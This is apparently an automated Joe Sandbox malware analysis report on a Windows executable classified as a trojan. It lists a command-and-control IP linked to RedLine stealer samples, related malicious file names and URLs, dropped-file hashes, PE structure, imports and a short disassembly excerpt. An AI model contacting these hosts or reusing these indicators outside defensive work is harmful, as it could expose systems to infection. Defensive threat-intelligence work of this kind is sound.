                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        185.222.58.90
                                                                        unknownNetherlands
                                                                        51447ROOTLAYERNETNLtrue
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1580472
                                                                        Start date and time:2024-12-24 17:16:06 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 3m 30s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:5
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:aYf5ibGObB.exe
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:8a65e4ace5821564817c5f343352474c.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.evad.winEXE@4/3@1/1
                                                                        EGA Information:
                                                                        • Successful, ratio: 100%
                                                                        HCA Information:
                                                                        • Successful, ratio: 99%
                                                                        • Number of executed functions: 49
                                                                        • Number of non-executed functions: 297
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Stop behavior analysis, all processes terminated
                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                                                        • Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172, 2.16.168.102, 2.16.168.117, 13.107.246.63
                                                                        • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, download.windowsupdate.com.edgesuite.net
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • VT rate limit hit for: aYf5ibGObB.exe
                                                                        TimeTypeDescription
                                                                        11:17:09API Interceptor2x Sleep call for process: RegSvcs.exe modified
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        185.222.58.90K3xL5Xy0XS.exeGet hashmaliciousRedLineBrowse
                                                                        • 185.222.58.90:55615/
                                                                        DBAcglWJwi.exeGet hashmaliciousRedLineBrowse
                                                                        • 185.222.58.90:17910/
                                                                        QUOTATION062022.exeGet hashmaliciousFicker Stealer, RedLineBrowse
                                                                        • 185.222.58.90:17910/
                                                                        QUOTATION 061622.exeGet hashmaliciousFicker Stealer, RedLineBrowse
                                                                        • 185.222.58.90:17910/
                                                                        SecuriteInfo.com.Variant.MSILHeracles.37401.28222.exeGet hashmaliciousRedLineBrowse
                                                                        • 185.222.58.90:17910/
                                                                        RFQ - FYKS - 06052022.exeGet hashmaliciousRedLineBrowse
                                                                        • 185.222.58.90:17910/
                                                                        MACHINE SPECIFICATIONS.exeGet hashmaliciousRedLineBrowse
                                                                        • 185.222.58.90:17910/
                                                                        MACHINE SPECIFICATIONS.exeGet hashmaliciousRedLineBrowse
                                                                        • 185.222.58.90:17910/
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        s-part-0035.t-0009.t-msedge.nethttps://u48635528.ct.sendgrid.net/ls/click?upn=u001.9c3qucD-2BQzNTT0bmLRTJr37m0fhz0zdKJtvEO5GYL-2FheRuyVOh-2FQG4V3oBgBPYNynDxn_I1ksFJapfNmw0nKrksu71KTxdlg2CVrjzBUVofCtIEhaWkhL1Pph-2Ffg-2BCFbPvkCL9SX-2Fn-2BNBrku3RcjHS1atB8ladrmemt-2BtQU5680xhgoUl-2FmS0Bdj-2FOfednny-2F-2Bj2bwjjubeRvrpN0J7TGLD3CnNRzymiQOzypjCqxHhzmXtY2EWHJMJBxjl-2FHlyEIekWjEdTpTsRC8R5LaI-2BXF4kV8UeUtXxyFJLbYiR3fqcWt2evvBBECu9MeQj8TLZrmfuTf-2BJQraijp8-2BcIdxf8rnVxjHoJK1lo9-2Bkao444JbRSinVA-2FoUxeuAtdlrITU1Z6gHAn7DLZstY4XJkhkT16-2F2TN4CFt2LQ-2BEh9GWg4EPlocPi8ljTs-2B9D9RVbWdc3s2Vk2VPHSj20oCO3-2FalihBzGJuaYie5tnYaz6wBF3EqNzMXmVqRnMZwSYuGRwSMVhkchytYzt3hUH-2F51IUfn7nuhHUcUbdS8nBYneAMuB2eSDRn8IZzUkExLUascCVn8T9ImEyo0qhVsBPdJjfT9L3qli9clY1N-2BhQXDZgQnsN1Bs9PujeLzem37C62BvWnqPnqvXh5vbcvseiZwTP35DEJysw-3D-3D#mlyon@wc.comGet hashmaliciousHTMLPhisherBrowse
                                                                        • 13.107.246.63
                                                                        Audio02837498.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                        • 13.107.246.63
                                                                        gDPzgKHFws.exeGet hashmaliciousCryptbotBrowse
                                                                        • 13.107.246.63
                                                                        Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 13.107.246.63
                                                                        http://au.kirmalk.com/watch.php?vid=7750fd3c8Get hashmaliciousUnknownBrowse
                                                                        • 13.107.246.63
                                                                        https://www.bing.com/search?pglt=41&q=%E5%B9%B3%E6%88%9031%E5%B9%B4+%E8%A5%BF%E6%9A%A6&cvid=467cba4c80be484e858dd735013f0921&gs_lcrp=EgRlZGdlKgYIARAAGEAyBggAEEUYOTIGCAEQABhAMgYIAhAAGEAyBggDEAAYQDIGCAQQABhAMgYIBRAAGEAyBggGEAAYQDIGCAcQABhAMgYICBAAGEAyCAgJEOkHGPxV0gEINjUyMGowajGoAgCwAgE&FORM=ANNAB1&PC=U531Get hashmaliciousUnknownBrowse
                                                                        • 13.107.246.63
                                                                        pwn.dll.dllGet hashmaliciousCobaltStrikeBrowse
                                                                        • 13.107.246.63
                                                                        7kf4hLzMoS.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                        • 13.107.246.63
                                                                        2S5jaCcFo5.exeGet hashmaliciousUnknownBrowse
                                                                        • 13.107.246.63
                                                                        QDQXUZhiY3.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                        • 13.107.246.63
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        ROOTLAYERNETNLK3xL5Xy0XS.exeGet hashmaliciousRedLineBrowse
                                                                        • 185.222.58.90
                                                                        Invoice-BL. Payment TT $ 16945.99.exeGet hashmaliciousRedLineBrowse
                                                                        • 45.137.22.164
                                                                        MfzXU6tKOq.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                        • 185.222.58.82
                                                                        lWnSA7IyVc.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                        • 185.222.58.229
                                                                        8ZVd2S51fr.exeGet hashmaliciousRedLineBrowse
                                                                        • 185.222.58.241
                                                                        Purchase Order Purchase Order Purchase Order Purchase Order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 185.222.57.90
                                                                        Purchase Order Purchase Order Purchase Order Purchase Order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 185.222.57.90
                                                                        9dOKGgFNL2.exeGet hashmaliciousRedLineBrowse
                                                                        • 45.137.22.126
                                                                        RFQ List and airflight 2024.pif.exeGet hashmaliciousPureLog StealerBrowse
                                                                        • 45.137.22.174
                                                                        Calyciform.exeGet hashmaliciousGuLoaderBrowse
                                                                        • 45.137.22.248
                                                                        No context
                                                                        No context
                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2085
                                                                        Entropy (8bit):5.347800113426864
                                                                        Encrypted:false
                                                                        SSDEEP:48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHj:vq5qxqdqolqztYqh3oPtI6mq7qoT5D
                                                                        MD5:C83D97E3320B0B949C583E5BC51FF14B
                                                                        SHA1:2E8C65CB1A038AD387F276B3F9B4008887913321
                                                                        SHA-256:F30EF7CFC4A0DBDEF388578576D1C58628592A9EB85443574DB1979970C63AE5
                                                                        SHA-512:94671EB75241B67C8F443B1763028F2A2D7B10C6F147C860A6A4B9D19893FF4A2DCAF353ECE7BFF1A803191578B837BA4A0537EF29FAF78185ACAC8E77D1ABE8
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,
                                                                        Process:C:\Users\user\Desktop\aYf5ibGObB.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):81044
                                                                        Entropy (8bit):7.926753643425252
                                                                        Encrypted:false
                                                                        SSDEEP:1536:2sORBvO4m4PF5Es/BAG8nrk1UnVBGa58xklOmJ0Vubey/YHX5FliLEqjsfRHRl:wRs4LEUJ8ncWVsaCkT3CyA3icn
                                                                        MD5:3725ED2973882A1880DDD8B6D3DB9353
                                                                        SHA1:3FFF3E0966D9EB5D12C02354E48A5E9D8CF6E78A
                                                                        SHA-256:64C90C2EE7E80215463186446A56385368F1F828808C50CE07404671C8A4170E
                                                                        SHA-512:EA3C338A17ED81BCFA0D186963FEC5B94874C381C32F0EA54211080F9144881B0B961994A6EA09B9E190F880118445DD2139D25EEB5CC47A9B517981EAA9F76A
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:EA06..~..G...m2sZ..)T.^.iV.L)4...L..s:%2.N..* .eR.4.V...O.....l.U..I.....}....7^.P,..T.WK..,..D.i[.^.R.|..>.I..;..?x.....&.C..(..q.S sz....o..5..U+s.E..4.Si.jX.f".....i...fiP..C..%2..E.h..3Z.2..E.m2...+T..(.m...2@..U.6;..U.W....M..(...6>.4..y..;.......e..o..U&...6.boV.N...l..c2*..M.Q.oU.$..&.....F..6{..9...l.N..>....a.I..}b.@..qT..jl.6Mi..?..Q..^.u=......(...~i...)6=..O.6..Jex......e.9...[.S.(......W+..U>.0..k.......JkU....6\.S:M>....)..d.L.Qn.Z.F.M.TkSJ.6OP.Tf..m.A\..h..u69...iT..riV.P......i.J9.%2.k.N.u......Ik..M....TxS...i.Ri....J..3:.ju..&..T.}C....E:sZ..T..b.)..i..=R.c...zM&.2..4...0.T..JT.H.Qi.:%..B.Nj..H..'..SJ..D..R.4..6.X..}4....a..^...&.S.....SZ..@C...sJ...S .ruH..+U.Lv.:...zd.t.`)5J.r.Z.P..B.=..&.*.:.3.W........W...e..^.N&@(...8.U..j.BB...i...Z.I..cuZeb.v...4J.>.5..6..=.yx.....@.l...i]~.T.G(...r.%.M..j...N..R....b.....d.O.L...<.3..(5.T..X.R...d....@!....h.P....*.z.....\.sx..i4......RftJT...RK...e.3A.S.`@&..^.P.z.b.F.v...m.4.\k..ufeA..
                                                                        Process:C:\Users\user\Desktop\aYf5ibGObB.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):97792
                                                                        Entropy (8bit):7.019638296151846
                                                                        Encrypted:false
                                                                        SSDEEP:1536:hItUBDiEZ/kptweMfEqR7zR0+0T21/imVR1prUMGU5wJeS7kcIN5WibhweWQY9YX:YcXcqRV1/bVR1pIM95MeS7kcILNhw9x+
                                                                        MD5:696C6B600A8315043F81E59EA0A24071
                                                                        SHA1:ABF8C35525C3EC81F6F0B12CA42D5A8A4122D4EF
                                                                        SHA-256:CA1AA360EAA8790C2265910DE07F179F3312C3567963698535096F0A3201719A
                                                                        SHA-512:198CE1757128C6AB18EDD5068D68C7DD57B55F09B66E11335F8ACEFD2EC2E5FE0DC1AE00B857C8FDCBC9B2F7BBBD5956EDC9A9863BB25042EC7D61DC134E614A
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:~..XML9ZUDJI..4V.0IOY4PL.6C3DLXNL9ZQDJITZ4VZ0IOY4PLO6C3DLXNL.ZQDDV.T4.S.h.Xx.m.^*@d<*!+K;<d)(:4["zR,o+A>l&Xcw..x##]?.IGCpZ4VZ0IO.qPL.7@3..T.L9ZQDJIT.4T[;H.Y4$MO6K3DLXNL..PDJiTZ4VZ0IO.4PlO6C1DL\NL9ZQDJMTZ4VZ0IO.5PLM6C3DLXMLy.QDZITJ4VZ0YOY$PLO6C3TLXNL9ZQDJIT..WZ{IOY4.MO.G3DLXNL9ZQDJITZ4VZ0I.X4\LO6C3DLXNL9ZQDJITZ4VZ0IOY4PLO6C3DLXNL9ZQDJITZ4VZ0IOY.PLG6C3DLXNL9ZQLjIT.4VZ0IOY4PLO.7V<8XNL.)PDJiTZ4"[0IMY4PLO6C3DLXNL9zQD*g&)F5Z0I.]4PL.7C3BLXN:8ZQDJITZ4VZ0IO.4P.aD&_+/XN@9ZQD.HTZ6VZ05NY4PLO6C3DLXNLyZQ.JITZ4VZ0IOY4PLO6S.ELXNL9.QDJKT_4..0Ic.4POO6CpDL^NL9ZQDJITZ4VZ0IOY4PLO6C3DLXNL9ZQDJITZ4VZ0IOY4PLO-s:Dl[NL8ZQU9HTZ>\XNJOY0uaX.=1DL\.J)ZQB9KTZ>s.3IO].QLO.,7DLREt.XQDM&QZ4\M'P.Q4PMj \9.EXNM..[EJM|\4VPCNOY>.iX(.:DLYk.;[Q@bOTZ>%]0IE..HQ.?C3Ei.IM9^yBJI^)3VZ:.gX5PJ >C3N@`.N9ZCFb@TZ>[)9IO_'T?c7C5WIIJ23ZQN7HTZ0(P0IEJ2AHFEH3DFpBL9P>IJI^'5VZ4XK"5PLK)L.MLXOi.HPDNaRZ4\)7IOS[^LO<o)Z.QNL8...JIPr2VZ::HY4Z_I..:[r.GL9[t..IT^.PZ0C<^4PF=7C342RNL3r^DJC|J4VP_GOY>}B^282DL\fH8ZWoFXP!5VZ4aLX4V_I'E.ULXDvo[QD[OB5&VZ:ZGK<x_O6I\
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):6.87502459468992
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:aYf5ibGObB.exe
                                                                        File size:1'058'816 bytes
                                                                        MD5:8a65e4ace5821564817c5f343352474c
                                                                        SHA1:5921aa00413c8ebcc7f639740e85f0389c8c7e09
                                                                        SHA256:aeb46a41343bbbfb2a1fc6b6eec7e60657361be81c61c3adaa11357898a45d4b
                                                                        SHA512:9a44c2c1838567b9b1e1280b338a2b5a6eddb0ad7310e078a9a74e3374ba826ba5344b627c3a06fef90da0168fb6d6349954e867ceb09b68de0eca068f11bb28
                                                                        SSDEEP:24576:WqDEvCTbMWu7rQYlBQcBiT6rprG8aNVscHOCWth:WTvC/MTQYxsWR7aNVsfCC
                                                                        TLSH:9735AF0273D1C062FFAB92334B5AF6515BBC69260123E61F13981DB9BE701B1563E7A3
                                                                        File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                        Icon Hash:aaf3e3e3938382a0
                                                                        Entrypoint:0x420577
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x67625D89 [Wed Dec 18 05:28:41 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:5
                                                                        OS Version Minor:1
                                                                        File Version Major:5
                                                                        File Version Minor:1
                                                                        Subsystem Version Major:5
                                                                        Subsystem Version Minor:1
                                                                        Import Hash:948cc502fe9226992dce9417f952fce3
                                                                        Instruction
                                                                        call 00007F909CB24AC3h
                                                                        jmp 00007F909CB243CFh
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        push esi
                                                                        push dword ptr [ebp+08h]
                                                                        mov esi, ecx
                                                                        call 00007F909CB245ADh
                                                                        mov dword ptr [esi], 0049FDF0h
                                                                        mov eax, esi
                                                                        pop esi
                                                                        pop ebp
                                                                        retn 0004h
                                                                        and dword ptr [ecx+04h], 00000000h
                                                                        mov eax, ecx
                                                                        and dword ptr [ecx+08h], 00000000h
                                                                        mov dword ptr [ecx+04h], 0049FDF8h
                                                                        mov dword ptr [ecx], 0049FDF0h
                                                                        ret
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        push esi
                                                                        push dword ptr [ebp+08h]
                                                                        mov esi, ecx
                                                                        call 00007F909CB2457Ah
                                                                        mov dword ptr [esi], 0049FE0Ch
                                                                        mov eax, esi
                                                                        pop esi
                                                                        pop ebp
                                                                        retn 0004h
                                                                        and dword ptr [ecx+04h], 00000000h
                                                                        mov eax, ecx
                                                                        and dword ptr [ecx+08h], 00000000h
                                                                        mov dword ptr [ecx+04h], 0049FE14h
                                                                        mov dword ptr [ecx], 0049FE0Ch
                                                                        ret
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        push esi
                                                                        mov esi, ecx
                                                                        lea eax, dword ptr [esi+04h]
                                                                        mov dword ptr [esi], 0049FDD0h
                                                                        and dword ptr [eax], 00000000h
                                                                        and dword ptr [eax+04h], 00000000h
                                                                        push eax
                                                                        mov eax, dword ptr [ebp+08h]
                                                                        add eax, 04h
                                                                        push eax
                                                                        call 00007F909CB2716Dh
                                                                        pop ecx
                                                                        pop ecx
                                                                        mov eax, esi
                                                                        pop esi
                                                                        pop ebp
                                                                        retn 0004h
                                                                        lea eax, dword ptr [ecx+04h]
                                                                        mov dword ptr [ecx], 0049FDD0h
                                                                        push eax
                                                                        call 00007F909CB271B8h
                                                                        pop ecx
                                                                        ret
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        push esi
                                                                        mov esi, ecx
                                                                        lea eax, dword ptr [esi+04h]
                                                                        mov dword ptr [esi], 0049FDD0h
                                                                        push eax
                                                                        call 00007F909CB271A1h
                                                                        test byte ptr [ebp+08h], 00000001h
                                                                        pop ecx
                                                                        Programming Language:
                                                                        • [ C ] VS2008 SP1 build 30729
                                                                        • [IMP] VS2008 SP1 build 30729
                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x2bde8.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1000000x7594.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rsrc0xd40000x2bde80x2be009d3afbedc8b7c2c4b7e413f8d417fb1bFalse0.8507278311965812data7.690583180369149IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x1000000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                        RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                        RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                        RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                        RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                        RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                        RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                        RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                        RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                        RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                        RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                        RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                                        RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                        RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                                        RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                        RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                        RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                        RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                        RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                        RT_RCDATA0xdc7b80x230afdata1.0003553140349044
                                                                        RT_GROUP_ICON0xff8680x76dataEnglishGreat Britain0.6610169491525424
                                                                        RT_GROUP_ICON0xff8e00x14dataEnglishGreat Britain1.25
                                                                        RT_GROUP_ICON0xff8f40x14dataEnglishGreat Britain1.15
                                                                        RT_GROUP_ICON0xff9080x14dataEnglishGreat Britain1.25
                                                                        RT_VERSION0xff91c0xdcdataEnglishGreat Britain0.6181818181818182
                                                                        RT_MANIFEST0xff9f80x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                        DLLImport
                                                                        WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                        VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                        MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                        WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                        PSAPI.DLLGetProcessMemoryInfo
                                                                        IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                        USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                        UxTheme.dllIsThemeActive
                                                                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, 